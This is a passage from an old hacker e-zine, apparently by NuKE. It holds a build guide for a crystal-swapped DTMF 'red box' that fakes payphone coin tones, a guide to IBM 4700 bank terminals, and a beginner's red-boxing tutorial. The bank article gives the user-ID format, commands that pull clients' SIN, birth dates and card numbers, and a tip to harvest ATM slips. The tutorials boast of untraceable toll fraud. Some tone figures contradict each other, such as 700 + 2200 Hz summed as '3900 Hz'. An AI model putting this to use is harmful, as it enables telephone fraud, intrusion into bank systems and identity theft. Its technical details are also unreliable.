the IC) and a key-pad.                                                     
                                                                           
The construction of the DTMF Tone Generator is perhaps the hardest part of 
this project, and yet that is quite fairly simple. Anyhow this project does
require you to know the basics of kit building, and hopefully you know how 
to use a soldering iron, as you will need to solder the IC and Crystal onto
a simple board. Now the DTMF tones are generated internally inside the IC, 
but the timing depends on an external crystal oscillator. And the only     
external component we have is the 3.579545 MHz crystal: right here we have 
a "white box," as a white box is suppose to generate the DTMF "Touch-Tone" 
tones. Now if we replaced the 3.579545 MHz crystal with an 6.5536 MHz one, 
our "*" key on the key-pad will actually be DARN close to 3900 Hertz, the  
EXACT frequency that a coin stimulates when being entered inside the pay-  
phone. So in reality instead of putting $0.25 you can put theses tones on  
the mouth piece and fool the Bell System.                                  
                                                                           
                                                                           
Brief Operation                                                            
~~~~~~~~~~~~~~~                                                            
When entering a $0.25 into a payphone the only way the phone company knows 
that you entered money by a tone which consists of a 700 Hz + 2200 Hz      
(3900 Hz) being flushed into the line. For quarter you will need 3900 Hz   
for 35ms in length and a pause for 35ms and then 3900hz for 35ms then a    
pause...etc. This must be produced exactly FIVE times, so you should have  
five tones of 3900hz of 35ms with pauses of 35ms between each.             
                                                                           
Our DTMF generator contains a ten-number memory. When we save a number into
the DTMF memory and replay it, the redial timing will play the tone for    
72.3ms and pause for 72.3ms before going to the next tone and playing that 
for 72.3ms! Now the tones will be played at this speed ONLY with the       
3.579545 MHz crystal, as the crystal controls ALL LOGIC and TONE GENERATING
TIMING! So when this is replaced with a 6.5535 Mhz crystal it naturally    
will be alot faster and the timing will be faster. As a matter of fact the 
timing is NOW 34.3ms! So anything redialled by the DTMF generator will come
out at 34.3ms and a pause for 34.3ms. Our "*" key will also sound very     
close to the 700 + 2200 Hz, and therefore saving "*" 5 times in a memory   
and redialling it will result into sounding like a $0.25, all one has to do
is put red box to the payphone mouth piece and the phone system will think 
you entered a valid $0.25.                                                 
                                                                           
                                                                           
 _____________________                                                     
/ General Description \____________________________________________________
                                                                           
Features                                                                   
~~~~~~~~                                                                   
   ■ 2.5V-12V operation when generating tones, which is A LOT              
     less voltage needed, compared to several white boxes I've             
     seen which ask for 16V-24V.                                           
   ■ Stores and auto-dials ten 16-digit numbers.                           
   ■ Last number redial.                                                   
   ■ Scratchpad, meaning number storage without dialling.                  
   ■ 14 Keys, separate storage and redial buttons.                         
   ■ 2-digit overwrite for PBX access codes.                               
   ■ Low harmonic distortion.                                              
   ■ Single-contact or negative-common (2-of-8) key-pad inputs.            
                                                                           
Well, before we begin I must say that replacing the 3.57545 Mhz crystal    
with an 6.5536 will give us the 3900 Hertz tone ONLY by the "*" key. With  
this information the same is true for any key, on the keypad! In fact my   
calculations proved that in order to get an EXACT 3900 Hertz by the "*"    
key we would need a crystal of about 6.4857 Mhz. However chances of        
production of an 6.4857 Mhz crystal is asking for a little too much, so    
naturally we settle for the closest one possible to it; besides analog     
signals are quite difficult to simulate exactly, compared to digital,      
which is always exact!                                                     
                                                                           
This IC is from "National Semiconductor Corporation" model number TP5660.  
Perhaps even the exact IC in the Radio-Shack Pocket Dialer with Memory,    
as the one without memory uses the TP5650 which is this exact IC but       
without memory! The Operating temperature is -30°C to +60°C. This IC       
looks like so:                                                             
                                                                           
                          1┌─────┬──┬──────┐16                             
                      Vdd──┤     └──┘      ├───TONE OUT                    
                          2│ National      │15                             
                       Vm──┤ Semiconductor ├───Row 5                       
                          3│ (Linear       │14                             
                    Col 1──┤  Databook)    ├───Row 1                       
                          4│               │13                             
                    Col 2──┤               ├───Row 2                       
                          5│    TP5660     │12                             
                    Col 3──┤               ├───Row 3                       
                          6│               │11                             
                      Vss──┤               ├───Row 4                       
                          7│               │10                             
 ┌─────────────────OSC─IN──┤               ├───MUTE OUT                    
┬┴┬ 3.579545 Mhz Crystal  8│               │9                              
┴┬┴ Control OSC. ┌OSC─OUT──┤               ├───Col 4                       
 └───────────────┘         └───────────────┘                               
                                                                          
Replace above with the below to have both Red & White Boxes in one.        
  ┌───┬────                                                                
 ┬┴┬ ┬┴┬  3.579545 Mhz                                                    
 ┴┬┴ ┴┬┴                                                                   
  └ │ ┘  If you put a two-way switch you can switch from crystal,         
   └────── to crystal, and you'll have a red and white (combo) box!       
 Your new crystal should be 6.5536 for "*" Key                             
                                                                           
                                                                           
Pin Description                                                            
~~~~~~~~~~~~~~~                                                            
Vdd (Pin 1): The positive supply to the device, referenced to              
     Vss. A power-on reset circuit ensures correct operation               
     following initial power-up.                                           
                                                                           
Vm (Pin 2): The negative terminal of the back-up battery for on-hook       
     memory retention. A low-voltage detect circuit prevents               
     missoperation of the circuit in the event of a reduction in           
     the on-hook supply voltage below that required to retain              
     stored data.                                                          
                                                                           
COLUMN & ROW Scans (Pins 3, 4, 5, 9, 11, 12, 13, 14, 15): When no key is   
     closed, pull-up resistors are active on COLUMN inputs and             
     pull-down resistors are active on ROW inputs. Therefore               
     after a key is pressed the ROW pull-down resistors cause a            
     negative-true on COLUMN inputs (for standard telephone                
     key-pads negative-common).                                            
                                                                           
Vss (pin 6): The negative supply to the device in the off-hook             
     state.                                                                
                                                                           
OSC IN, OSC OUT (pin 7, 8): All logic and tone generator timing is         
     derived from the on-chip oscillator circuit.                          
                                                                           
MUTE OUT (pin 10) This is a CMOS output which sinks current to             
     Vss when no tones are being generated and sources current             
     from Vdd when tones are being generated.                              
                                                                           
TONE OUT (pin 16): This output is the open emitter of an NPN               
     transistor. The other pin (collector) is connected with the           
     Vdd.                                                                  
                                                                           
Well, this is the exact pin description according to the abilities and     
limitations of this IC. Now this Integrated Circuit (IC) was designed to   
be powered by the telephone line and a battery to keep the memory intact.  
Well, due to the fact that we are powering this circuit by battery you can 
feed both Vm and Vss to the same negative supply, the battery, of course.  
Now the MUTE OUT pin is perhaps also bothering you; well, this circuit was 
designed to drive a simple interface circuit to mute the receiver when any 
key is depressed. Again this is NOT needed as you will be connecting your  
DTMF generator to a small speaker rather than putting it directly into the 
line, as this circuit was designed for that, so all that MUTE does is when 
you start depressing keys it mutes of the receiver so that it will not     
interfere with other incoming sounds misstated as DTMF tones. However you  
can avoid adding a speaker by un-screwing the mouth piece and feed the     
TONE-OUT and Vdd supply directly into the conventional payphones, however  
this may attract unwanted glances, so you'll be better off with a          
speaker.                                                                   
                                                                           
The next part is about the key-pad, perhaps complex if you plan to design  
your own. Frankly, I found that time consuming; you can buy key-pads in    
several electronics stores, as Radio Shack, but I did find it in a local   
electronics store. Then again, if you have an old phone I guess you can    
take it from there. Now I must warn you there are TWO types of key-pads    
that are widely used, and both will work on this circuit, but you need     
to know which one you have in order to make corrections.                   
                                                                           
The key-pad found in most telephones are what we call STANDARD KEYPADs.    
This has to do on the way the switch is connected inside.                  
                                                                           
        │         Simply, when a key is depressed, it closes the           
 ──────┬┼───Row   switch but also comes in contact with the                
     │┘│         negative power supply. Thus we call this method          
   ──┤  │         NEGATIVE-COMMON or/and standard key-pad.                 
  Vss│─┤                                                                  
        Col                                                                
                                                                           
        │         As you can see, this method consists of the row          
        ├──┐      and column coming to contact (a closing of a             
        │        switch). This type of keypad we call                     
 ───────┼──■─Row  SINGLE-CONTACT key-pad.                                  
        │                                                                  
        Col                                                                
                                                                           
If you plan to build your key-pad certainly the single key-pad is the way  
to go, it's a lot simpler. So if your using a standard key-pad remember to 
connect the negative supply to the key-pad! All that's left now is to      
connect the key-pad to the circuit, very easy and fast; you just connect   
Col 1 to Col 1, Row 1 to Row 1, etc... You may notice that this is a       
military-style key-pad, as it includes the A, B, C, D keys which you don't 
find in your everyday phone key-pads. You really don't need them, so if    
you don't have them don't alarm yourself, just don't connect them!         
However you will need TWO extra keys, one for STORE command and the other  
for the REDIAL, so either add an extra key or switch or whatever you wish  
and connect it, like so.                                                   
                                                                           
     ┌────────────────────────────Col 1                                    
     │     ┌──────────────────────Col 2                                    
     │     │     ┌────────────────Col 3                                    
     │     │     │      ┌─────────Col 4                                    
  ┌──┴──┬──┴──┬──┴───┬──┴──┐                                               
  │  1  │  2  │  3   │  A  ├──────Row 1                                    
  ├─────┼─────┼──────┼─────┤                                               
  │  4  │  5  │  6   │  B  ├──────Row 2                                    
  ├─────┼─────┼──────┼─────┤                                               
  │  7  │  8  │  9   │  C  ├──────Row 3                                    
  ├─────┼─────┼──────┼─────┤                                               
  │  *  │  0  │  #   │  D  ├──────Row 4                                    
  ├─────┼─────┼──────┼─────┤                                               
  │Store│     │Redial│     ├──────Row 5                                    
  └─────┴─────┴──────┴─────┘                                               
                                                                           
Ahh, congrads, your DTMF Generator is now completed! If you were like      
myself and added an extra switch to go from white box to red box mode,     
GREAT! The only difference is that a white box needs the 3.57545 Mhz       
crystal and the red box needs the corresponding crystal, so simply put a   
switch and move from mode to mode. Now for the red box to work we need five
3900 hertz at 33 milliseconds apart and 33 milliseconds long, so you'll    
need to save your key five times in memory and then simply put the box to  
the mouthpiece end of the payphone and press the memory key, you have just 
enter $0.25 into the payphone.                                             
                                                                           
NOTE: I only have this working with the 6.5536 Mhz crystal. I cannot say   
that the timing interval will be exact with the other crystals; chances    
are that taking a crystal of 7.XXXXXX or 5.XXXXXX Mhz is simply too far    
from the 700 + 2200 hertz tone. Try to get the closest value to 6.50 Mhz.  
                                                                           
I didn't include the way to save the red box tone into the memory,         
as you get a nice little paper when you buy the IC, but in case you don't  
you first power up the unit, press "*" (or your valid red box tone key)    
five times and then you press STORE and a number in which to store it in.  
And to dial the stored key, press REDIAL and the number in which you       
stored the red box tone! Remember the NEW crystal should be installed at   
ALL times to generate the RED BOX tone! If you save the tone with your     
6.XXXX Mhz intact and redial it with the 3.57545 Mhz it will not work!     
                                                                           
Lastly, I recommend an "A-Cut Crystal (NTSC TV color-burst)" for both the  
3.57545 and your red box crystal. Try local components stores. You should  
find the crystal, or else look around, ask around; I did leave you with a  
few references near here where I got most of my stuff so you can try them  
out if you can't find them on your own.                                    
                                                                           
                                                                           
REFERENCE                                                                  
          Addison Ltd/Ltee                                                 
          8018 20th Avenue                                                 
          Montreal, Canada, H1Z-3S7                                        
          tel: 1-514-376-1740                                              
                                                                           
          Active Electronic Components                                     
          6080 Metropolitan East                                           
          Montreal, Canada, H1S-1A9                                        
          tel: 1-514-256-7538                                              
               1-800-363-7601 (Outside Quebec)                             
                                                                           
          Hamilton Avnet International Canada                              
          2570 Sabourin St., St-Laurent                                    
          Montreal, Canada, H4S-1M2                                        
          tel: 1-514-331-6443                                              
               1-800-361-7129 (Outside Quebec)                             
                                                                           
          National Semiconductors Corporation                              
          2900 Semiconductuctor Drive                                      
          Santa Clara, California 95051, USA                               
                                                                           
     ALSO: Try out Motorola and RCA dealers. They carry lots of            
           crystals that go into TV decoders/scramblers, so there's a      
           very good chance they should have it.                           
                                                                           
The crystals don't cost more than $1.00, kaypads can be bought for $0.75,  
PCBoard under $1.00, the IC goes for $2.00. The project should cost under  
$5 if you can find the supplies in local stores -- if I did in lonely      
Canada then you should have no trouble! If they don't have it, ask them to 
order it, if they ask "why?" tell them it's for a TV component, as TVs and 
related works like decoders and scramblers use NTSC TV color-burst         
crystals!                                                                  
                                                                           
NOTE: For the next InfoJournal I should have a DTMF Generator for "Caller  
IDs" (yep, you can send your own DTMF Caller ID tones), and how the        
number/name is received. So call up your local BBS with Caller ID and make 
it display 666-6666 and logon as your favourite Death-Angel character name.
Those interested in the actual project can contact myself anytime soon, of 
course you have must have a grasp of electronics!                          
                                                                           
                        Rock Steady/NuKE                                   
===========================================================================
===========================================================================
The IBM 4700 Unix Based Systems - PART I                                   
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~                                   
                                                                           
For those advanced hackers and perhaps "crazy" ones, the IBM 4700s are     
a new light. These systems are generally one of the hottest systems one    
can ever access. Theses systems are usually used in banks, and they are    
quite WIDELY used in Canada and the USA. I cannot speak for other parts of 
the world as I haven't been able to locate any of these huge systems yet!  
                                                                           
In this article I will show you a quick intro on the "user-friendly"       
4700s. I have also obtained REAL sample captures in order to document      
this article better. This article is only being released on the            
"free informational" consideration, and is solely for informational        
purposes. Any attempt to carry this to a further degree can lead to        
serious penalization by the law.                                           
                                                                           
Anyhow lets begin. Ever wonder what type of systems banks must use, when   
you set inside for a darn withdrawal or deposit of your money? The banks   
do contain somewhat disturbing information about yourself and do also sell 
this information to others for great deals of money. Credit Bureaus are    
perhaps the best organization to work with the bankers to provide          
almost all the credibility a person may hold. One can easily notice if a   
bank uses the nominal IBM 4700s by a fast look around inside the bank. Go  
in for a transaction and look over the cashier and see if you spot any     
terminals. These terminals are simply just a monitor and a keyboard, and   
the name "IBM" is usually plastered all over the monitor, so you can at    
least know its an IBM Network. Many models have been introduced, each      
have an added feature as the model number increases. Today the IBM 4700s   
are largely used. All the systems in all the same banks are hooked into    
one vast system located perhaps in the central bank head-officesa, and each
individual bank will be hooked into this system during the work hours. I   
don't know what system this 4700s hook up to, their speed seems like a     
very old Vax system, however I do not know so I can not say exactly. My    
experience is only with the station terminals (IBM 4700s).                 
                                                                           
The IBM 4700s nominally USED 1200/NONE Baud modems. These are perhaps due  
to the fact that this system originated in the 1979-80 period. However     
today many of these IBM 4700s are adding a 9600 baud modem. Starting in    
1988 IBM has developed a 9600 baud modem for these IBM 4700s systems, as it
provides a faster access time and a new security feature. Theses modems    
are known as IBM 9600 Modems Model 7861-015, these modems have CUT         
possible break-ins by at least 90%. For the first time these modems were   
equipped with a Data Encryption Standard (DES), during the 1988-89 period  
IBM marketed these 9600 Modems at a startling $2,000 a pop to all of the   
bank systems using IBMs.                                                   
                                                                           
However, before the 9600 modems, it is only fair to state that the         
software was equipped with DES that would encrypt/decrypt information as   
it pass through the server in/out the modem. The great improvement was     
that the 9600 Modems had DES build into the hardware, and it would         
encrypt/decrypt at a much faster rate compared to the older 1200.          
Nevertheless expect to encounter DES Encryption. DES contains a 56-bit key,
if the key can be broken you have just accessed the largest system a       
person can enter, thus generating the saying "Hacker's Heaven."            
                                                                           
You must read the "Data Encryption Standard (DES)" article published in    
this InfoJournal by myself to understand that DES is POSSIBLE to break.    
Compared to Lucifer, DES is a lot easier, and remote access to a bank      
system is very possible. Nevertheless, local access can be gained by       
accessing the terminal itself within the network. I will brief you on the  
functions and the work abouts of this IBM 4700s system.                    
                                                                           
One can easily know if they contain access to a IBM 4700s by its logon     
feature, which follows the bellow...                                       
                                                                           
------------------------------------                                       
IDENTICATION MODE ADMIN./MODE (4700)                                       
                                                                           
CODE DE L'USAGER / USER ID :                                               
MOT  DE PASSE    / PASSWORD:                                               
------------------------------------                                       
                                                                           
Okay, the "---" lines simple means that whatever is in between is the      
exact input/output this systems gives you once connected. Now the user ID  
must follow a certain pattern as that's how accounts are used in this      
system. The USER ID goes like so:                                          
                                                                           
XXX XXXXX                                                                  
│││  └────────> 5 digit number identifying the bank branch.                
││└───────────> User Letter. If the bank allows five people to access      
││              this system each will have a letter from A to E            
││              representing user #1 as A, #2 as B etc...                  
│└────────────> Access level: 1=Bank Manager (can do ALL).                 
│                             2=Bank Director (limited, can view           
│                               all but cannot make changes many           
│                               changes, like cancel a loan).              
│                             4=Even less access where you cannot          
│                               view all, and are restricted in            
│                               changes.                                   
│                             6=View only what #4 can. No                  
│                               changing possible.                         
└───> Language use: X=English                                              
                    T=French                                               
                                                                           
An example ID would be "T6A10281" whereby 10281 in the branch bank number, 
A is the first account in that bank, and 6 is the level of the code and T  
is the language to use (French).                                           
                                                                           
Once inside the system you will receive an ":" as a prompt. No help is     
given, but I did manage to find a few codes for you. Basically if one      
wishes to pull out a user account we can do so with the "CLTIDT6*"         
command!                                                                   
                                                                           
CLTIDT6* -> "*" Functions as an Enter key!                                 
││││││└──> The access level (View). A 4 would allow access to              
├┘│├┘│     make changes to the info displayed!                             
│ ││ └───> Separator                                                       
│ │└─────> "ID" = "IDentification requested"                               
│ └──────> Separator                                                       
└────────> "CL" = "CLient Info"                                            
                                                                           
So we can guess this will pull out the Client's ID! Doing an CLTIDT6*      
we will get a screen like so:                                              
                                                                           
-------------------------------------------------------                    
:CLTIDT6*                                                                  
::::::::        ENREGISTREMENT CLIENT PARTICULIER       ::::::::           
                                                                           
NO CLIENT :                                                                
                                                                           
NOM       :                                                                
PRENOM    :                                                                
N.A.S     :                   DATE NAISSANCE:                              
EMPLOYEUR :                             TEL :                              
-------------------------------------------------------                    
                                                                           
Unfortunately, this was a French account, so all the captures I have are in
French. Here's a quick lesson: NOM --> name; PRENOM --> given name;        
N.A.S --> Social Insurance Number (SIN); DATE NAISSANCE --> date of birth. 
                                                                           
The rest is simple. To search for a person you must try to fill in AS      
MUCH as possible to search for an account! The more INFO you got the       
better it is. Once you entered enough data you get two screens that are    
as follows. Since this is French, I added the English translation inside   
the inside the parenthesis.                                                
                                                                           
-------------------------------------------------------                    
NO CLIENT      : (Client number)        TRANSIT: (5-digit bank #)          
NO CARTE CLIENT: (Client info number)   DEPUIS : (Client since)            
                                                                           
NOM       : (Real last name)                                               
PRENOM    : (Given name)                SEXE : (Sex)                       
                                                                           
ADRESSE NO: (Address #) RUE : (Street)             APP.:                   
    VILLE : (City)                            PROVINCE :                   
    PAYS  : (Country)                      CODE POSTAL :(Postal/ZIP code)  
    A/S   :                                     LANGUE :(Language)         
    TEL.  :                                                                
                                                                           
N.A.S : (SIN)          DATE NAISSANCE: (Birth) NO PERMIS COND.:            
:                                                                          
--------------------------------------------------------                   
                                                                           
Pressing Enter will give you the next and final screen:                    
                                                                           
--------------------------------------------------------                   
NO CLIENT :                                                                
                                                                           
              ACTUEL                    PRECEDENT                          
EMPLOYEUR   : (Current employer)        (Last employer)                    
POSTE OCCUPE: (Job title)                                                  
DATE DEBUT  : (Since)               DEBUT:(Since)   FIN:(Until)            
              CODE:     TYPE:       TYPE :                                 
TELEPHONE   :                                                              
                                                                           
MASTER CARD : (M/C card number)                                            
VISA        : (Visa card number)                                           
CARTE CLIENT: (Automatic bank card number)                                 
NO COMPTE   : (Account numbers [and balance if access >= 4])               
            :                                                              
            :                                                              
            :                                                              
:                                                                          
--------------------------------------------------------                   
                                                                           
Con't in Part #2                                                           
                                                                           
The IBM 4700s Unix Base Systems - PART II                                  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~                                  
                                                                           
Everyone can now understand exactly how powerful a 4700s System really is. 
But perhaps the mind boggling truth is that this information can be easily 
tapped into illegally, and such information can cause great havoc. Perhaps 
the most mind boggling feature that I have seem to found interesting is the
search/profile of a client. In this section you can search a client in the 
bank with only needing VERY LITTLE information. There are six nominal ways 
to search for the clients profile and the are by:                          
                                                                           
     1. The Client Number (Format: XXXXX#########)                         
          The "X" represent letters and the "#" represent numbers. In order
          to get the Client Number you could have written it from getting  
          it in the first part! But the first part demands lots of         
          information of a person, in order to get it. With this all you   
          need is the person's last name, first letter of the given name   
          and date of birth.                                               
                                                                           
          Eg: John Smith -- Date of Birth 75-04-21                         
              Client Number = SMITJ249578001                               
          The way we got the number part is like so: take the date of birth
          and subtract by 99-99-99. So 75-04-21 = (9-7)(9-5) - (9-0)(9-4) -
          (9-2)(9-1). The last three digits are just in case there are     
          people with the same names and date of birth, kind of rare, 001  
          is usually ok, but try 002 if another guy exists.                
                                                                           
     2. Client Enterprise Number (Business Client Number)                  
          Same as above but for companies.                                 
                                                                           
     3. Valid Account Number                                               
                                                                           
     4. Valid Account Number of a Term-Deposits                            
                                                                           
     5. Automatic Teller Cards                                             
                                                                           
     6. Credit Card (M/C or VISA)                                          
                                                                           
One boggling fact is this one: when you go to an Automatic Teller Machine, 
check the garbage. You will see that some people will throw away their     
slips once they read the balance of the account. One DRAWBACK is that on   
the slip you will see your Automatic Teller Card Number written on top!    
This is particulary true for Canada's largest banks like Royal Bank,       
National Bank and TD Banks that nominally use IBM 4700s! All one must do   
is easily take your slip and ALL they need on you can be found in the 4700s
systems, and slowly you find yourself in financial trouble. Sometimes "free
information" such as these articles are written for your protection. The   
world is truely ruled by little bits of 1s and 0s, and turning on the right
bits can give you access to virtually anything. The code to access this    
search/profile is with the "CLTPR6*" command. Which will give you:         
                                                                           
-------------------------------------------------------                    
:CLTPR6*                                                                   
                                                                           
     1. NO DE CLIENT PARTICULIER :           (Client #)                    
     2. NO DE CLIENT ENTREPRISE  :           (Client # comp.)              
     3. NO COMPTE BANCAIRE       :           (Bank account #)              
     4. NO COMPTE PLACEMENT      :           (Term-Lock account)           
     5. NO COMPTE CARTE CLIENT   : XXXXXX-   (Teller card number)          
     6. NO COMPTE MASTERCARD     : XXXX-     (M/C card number)             
                                                                           
--------------------------------------------------------                   
                                                                           
The "Xs" are for SET numbers, depending what Bank system you enter the M/C 
and Teller Card always begin with the same first few digits. For Manhattan 
Bank M/C begin with 5424... Of course if you enter a Royal Bank the        
terminal will read VISA card number rather than M/C as Royal offers the    
VISA card. A search with this will get the two screens from the last part. 
There is also ways to find out loan information, or how many term-deposit  
one has at whatever interest rate. With the right access codes like a T2   
or a T1 you can access or void any of these accounts.                      
                                                                           
HOWEVER: as easy as this sounds, it is quite difficult, then again not     
difficult enough! Even if you wish to close your account in any bank your  
Information does NOT become erased, as I demonstrated this to Pure Energy  
who closed his accounts several years ago, though the information I got    
was quite old, as his address was invalid. Nevertheless I did get his date 
of birth, SIN and other information that can be used to access other       
systems in other banks to gain faster access to his accounts.              
                                                                           
Again this seems quite easy, I warn you not to try it, it will get you     
penalized by the lawman. Anytime you try to change accounts or access      
too much information the system creates a log, and alerts the              
administrators.                                                            
                                                                           
All the access commands I was able to find out is on the bottom:           
                                                                           
     -Identification of a client                                           
      CLTIDT6 *                                                            
     -Profil of a Client                                                   
      CLTPRO6 *                                                            
     -List of active and closed loans                                      
      CTTACT6 / # Client Number                                            
     -List of account numbers of a client                                  
      CLTDPT6 / # Client Number                                            
     -List of Term Deposits of a Client                                    
      DPTCDC6 / # Client Number                                            
                                                                           
I hope you found this information useful for your own protection.          
Remember don't leave any slips from automatic tellers, and never say your  
account number to a cashier, write it down and show it to them. A lot      
can be done to ruin you financially with the info these system contain.    
And last but not least I am not responsible for any attempts that you      
try to illegally access these systems, I know IBM will be GLAD to help     
you in sending you information of these system, of course you will have    
to "pretend" your part of a big corporation looking into their network!    
                                                                           
                        Rock Steady/NuKE                                   
===========================================================================
===========================================================================
A Beginner's Guide to Red Boxing                                           
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~                                           
                                                                           
About six months ago I made my first red box, and let me tell you, this is 
the way to go. With the ever-increasing dangers of phreaking, red boxing   
provides a safe, effective alternative that is easily available to those   
with little technical knowledge and allows calls anywhere in the world with
only a small investment. Before I elaborate on how to construct your red   
box (unlike Rock Steady, I took the easy way out and used the now-famous   
Radio-Shack conversion) and list some of the "tricks of the trade," let's  
list the pros and cons of red boxing compared to other forms of phreaking. 
                                                                           
Pros                                                                       
~~~~                                                                       
* UNTRACEABLE! Fuck ESS, nothing can find you with a red box! You're just  
  an average joe using a pay phone. Even if they do catch on, you can      
  just hang up and try again... Just don't abuse the same pay phone        
  for hundreds of dollars a month and everything's cool.                   
                                                                           
* Small, easy-to-carry unit is portable, durable, and looks like a         
  legitimate pocket dialer...                                              
                                                                           
* Perfect line quality. No static, no loss of volume, etc. unlike PBXs,    
  extenders, and other commonly-abused phone systems.                      
                                                                           
* Low cost...thirty dollars gets you unlimited free calls (I estimate I've 
  "spent" over $500 so far). The only upkeep cost is new batteries every   
  few months.  There's not even any cost at all for each call you make,    
  not even local charges, as with PBXs (if applicable in your area).       
                                                                           
Cons                                                                       
~~~~                                                                       
* Simply put, it's a hassle. You have to drag yourself out to a pay phone  
  to use it. You have to keep pressing the button periodically to add more 
  "money." Such is the price for free calls, I suppose...                  
                                                                           
* Because you're using a pay phone, calls are voice-only. Not only are     
  accoustic couplers slow and laptop use unusual (ahem), but pay phones    
  make a click every minute, plus you constantly get a synthesized voice   
  or operator demanding more money every so often.                         
                                                                           
* Sometimes you can get a suspicious operator... Your average operator     
  is of limited intellegence (hell, I've even told an AT&T operator what   
  I'm doing, and she still didn't get it [Me: "Hi, I'd like to red box a   
  call to Paris." Bitch: "You'll be paying with quarters?" Me: "No, I'm    
  red boxing it.  It's a device for commiting toll fraud."  Bitch:  "Sorry 
  sir, I'm not familiar with that calling plan. Do you want to pay with    
  your calling card?" Sheesh!]. Then again, five out of five               
  randomly-sampled AT&T operators didn't know what 2600 Hz is, but that's  
  another story...) Still, it's a chance. I've gotten a few suspicious     
  operators who hassle you and return your "money" and ask you to reinsert 
  it, and even one who knew what I was doing ("Ok sir, none of your        
  quarters have registered. I'm afraid I'm going to have to report that pay
  phone.  You aren't using quarters, the tones are coming from a small     
  black box." I just denied it and she reconnected me, but I kept *that*   
  call short. Sorry Lone Wolf.) I've even once gotten an intellegent local 
  operator (gasp!) ("Okay, please insert a quarter now... I'm sorry sir,   
  that did not sound like the quarter tone. Do you want to try inserting a 
  real coin?") You can always hang up and hope you get a less intellegent  
  one, but it's a pain in the ass.                                         
                                                                           
* At least in my area, local calls cannot be boxed directly...you have to  
  either go through an operator or use an Equal Access override code (see  
  below). Another hassle.                                                  
                                                                           
* To my knowledge, this only works on the North-American phone system...   
  Tough luck for all you foreigners :-).                                   
                                                                           
* Doesn't work on COCOTs, only pay phones owned by the local telco.        
                                                                           
Notes from Nowhere Man                                                     
~~~~~~~~~~~~~~~~~~~~~~                                                     
All of the above may not apply in your area; it all depends on how your    
local telco runs things. Specifically, in some areas you *may* be able to  
directly box local calls.                                                  
                                                                           
Certain phones don't seem to allow the tones to get through. So far,       
I've only found three such phones, two at one location (a gas station).    
Hopefully this is just a fluke and not some kind of trend...               
                                                                           
Also, don't think that you can get money by using your box and asking      
the operator for your money back.  It won't work.  You see, the actual     
coins that you've deposited are returned to you, and since you've put      
nothing in, you get nothing out.                                           
                                                                           
I'd also like to add that contrary to what it says in some text files,     
it is not necessary to deposit a nickle before making a call.  Supposedly  
the phone company performs a "ground test" when you make a call, so        
something has to be in the coin shute for the call to go through.  This may
or may not be true, but I've never deposited a coin before boxing a call   
and I've never had any problems directly due to this (I've gotten a few    
suspicious operators, but they've always relented after I "re-deposit" my  
"quarter" which didn't seem to register.  Of course, the international     
operators at AT&T are much better informed...)                             
                                                                           
                                                                           
Building Your Red Box                                                      
~~~~~~~~~~~~~~~~~~~~~                                                      
There are only two real components for a red box, at least using the       
"standard" method. The easiest part to get (but the more expensive one) is 
a Radio Shack "Thirty-Three Number Memory Pocket Tone Dialer," catalog     
number 43-141 (just ask the guy for "a tone dialer that can store          
numbers" to play dumb). At last check these are US$24.95 each (and they're 
kept behind the counter, so thieving is basically out unless you have      
inside connections). Be sure to get the one with memory features; the one  
with no memory is useless. The second thing you'll need is a 6.5536 MHz    
crystal. These can be obtained from your local electronics store (they're  
hard to find though, I know Radio Shack doesn't carry them) or from a mail 
order electronics distributor. (One frequently mentioned is Fry's          
Electronics in San Francisco, which sells these crystals for $0.89/each.   
They can be reached at 415-770-3763. I did not get my crystal from Fry's,  
so I cannot vouch for them.) In most cases the crystals cost between $.25  
and $1.00 each, plus postage, if applicable. Oh yeah, you'll also need     
three AAA batteries. You can just pick these up at the local convenience   
store or buy them at Radio Shack when you buy the tone dialer. (Note:      
There is a rumor that Radio Shack is no longer offering the tone-dialer    
with memory. The stores in my area still have them in stock, but in some   
places they're supposedly unavailable.  Get 'em while you can.)            
                                                                           
The only tools you'll need to make the red box are a small phillips        
screwdriver and a soldering iron (and solder). A pair of tweezers may also 
be useful. You'll want to work in a well-lit place, naturally, with good   
ventilation (solder gives off horrid fumes). First, unscrew the screws on  
the back of the tone dialer's case (there are some in the battery          
compartment, too). Carefully pry open the case; you'll need to apply more  
force than you would think, but be careful not to break it or lose the     
switches, which can fall out when the case is opened. Next, solder out the 
3.579 MHz crystal, which looks like a small silver cylinder toward the     
bottom-right of the board. Remove the crystal and save it. In it's place,  
solder in your 6.5536 MHz crystal, being careful not to let the two leads  
touch one another, or to drip solder across the two leads. Because the new 
crystal is much larger than the old one, you may have to *CAREFULLY* bend a
few other crystals to make room for it. Put the cover back on, and rescrew 
the case. Finally, pop in the three AAA batteries the dialer requires.     
You're now ready to program your box.                                      
                                                                           
Programming Your Red Box                                                   
~~~~~~~~~~~~~~~~~~~~~~~~                                                   
Ok, you've just replaced the crystal in your pocket dialer.  Now what      
do you do? It's pretty easy. Switch the Store/Dial switch to "Store" and   
turn the unit on. The red LED in the upper-left should go on (if it        
doesn't, you screwed up; open it up and try again). Now press the "Mem"    
button (left-most button on the bottom row) and then hit the star key ("*")
five (5) times. Then press Mem again and press a "Priority" button (one of 
the top three buttons); I like to use P3 for this. The unit should beep,   
letting you know that the number was stored. This button is now the        
"quarter" key. Next, press the Mem button, press P3 (or whatever button    
you used for the quarter key), Pause (the middle button on the bottom row),
P3, etc. (As an alternative to the Pause button, I have been informed that 
you can use the pound key instead, making your dialing much quicker.  I    
wouldn't use this on a live operator, though... After experimenting with   
this method, I've found that it tends to bring a live operator on the line 
very often.) You want to store four "quarters" and five pauses total, a    
pause between each "quarter." Then hit Mem again, then P2 (or whatever key 
you want to use for the $1.00 key), and wait for the beep. Flip your unit  
off, then switch the Store/Dial switch to Dial. Your red box is now ready. 
                                                                           
Why Does This Work?                                                        
~~~~~~~~~~~~~~~~~~~                                                        
You may be asking yourself "how in the world can this work?!" Basically,   
the red box works on the principle that when you put money into a pay phone
tones are generated to indicate to the CO that you've dropped in a coin;   
the red box simulates these tones, allowing you to make calls for free.    
When you replace the factory-installed 3.579 MHz crystal with the 6.5536   
MHz one, you are altering the DTMF tones upward so that the star key now   
happens to be the same pitch as a coin tone (1700 Hz + 2200 Hz). When you  
store the five tones, nothing particular happens; but it so happens that   
Radio Shack pocket dialers replay those stored tones at the precise rate   
that a pay phone expects for a quarter (five thirty-three millisecond beeps
with a thirty-three millisecond pause between each of the bleeps). (It is  
